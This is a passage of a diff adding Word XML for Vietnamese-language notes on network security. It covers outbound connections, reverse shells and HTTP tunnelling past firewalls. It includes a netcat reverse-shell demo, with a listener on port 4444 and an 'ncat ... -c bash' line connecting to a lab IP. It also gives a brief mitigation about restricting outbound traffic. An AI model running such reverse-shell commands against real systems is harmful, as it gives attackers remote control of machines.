+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vào</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>những</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>từ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nội</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>bộ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 1 server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đang</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lắng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nghe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thành</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>công</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cần</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>quyền</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> demo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nvlp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 4444 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>( window</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thật</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.43 )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.43 4444 –c “bash”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chế</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khóa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chỉ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>phép</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>địa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chỉ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cổng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hoạt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>động</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cho</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dịch</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>yêu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cầu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">HTTP Tunnel </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="720"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">HTTP </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Tunnel </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>vượt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> qua </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lửa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hạn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chế</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>mạng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>khác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
